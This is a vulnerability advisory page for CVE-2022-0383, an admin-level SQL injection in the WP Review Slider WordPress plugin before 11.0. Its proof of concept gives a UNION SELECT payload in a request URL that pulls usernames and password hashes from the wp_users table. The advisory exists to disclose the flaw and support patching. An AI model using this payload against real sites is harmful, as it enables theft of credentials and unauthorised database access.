WP Review Slider < 11.0 – Admin+ SQL Injection | CVE 2022-0383 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the pid parameter when copying a Twitter source, which could allow a high privilege users to perform SQL Injections attacks

Proof of Concept

Create a Twitter Source, copy it via the 'Copy' button, then change the pid parameter in the URL to 1000 UNION ALL SELECT 1,user_login,3,user_pass,5,6,7,8,9,10,11 FROM wp_users LIMIT 1

https://example.com/wp-admin/admin.php?page=wp_fb-get_twitter&taction=copy&tid=1000+UNION+ALL+SELECT+1,user_login,3,user_pass,5,6,7,8,9,10,11+FROM+wp_users+LIMIT+1&_wpnonce=f5e77f3e34

Affects Plugins

wp-facebook-reviews

Fixed in 11.0

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2666513

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Felipe de Avila

Submitter

Felipe de Avila

Submitter twitter

Verified

Yes

WPVDB ID

e0402753-3a80-455b-9fab-a7d2a7687193

Timeline

Publicly Published

2022-01-31 (about 3 years ago)

Added

2022-01-31 (about 3 years ago)

Last Updated

2022-04-12 (about 3 years ago)

Other

Published

Title

Published

2024-04-12

Title

Find Duplicates <= 1.4.6 - Authenticated (Subscriber+) SQL Injection

Published

2023-05-11

Title

Slimstat Analytics < 5.0.5 - Admin+ SQLi

Published

2015-05-07

Title

Amazon Product In a Post Plugin < 3.5.3 - Unauthenticated SQL Injection

Published

2017-05-31

Title

Easy Team Manager 1.3.2 - Authenticated Blind SQL Injection

Published

2025-12-04

Title

My auctions allegro < 3.6.33 - Unauthenticated SQL Injection via auction_id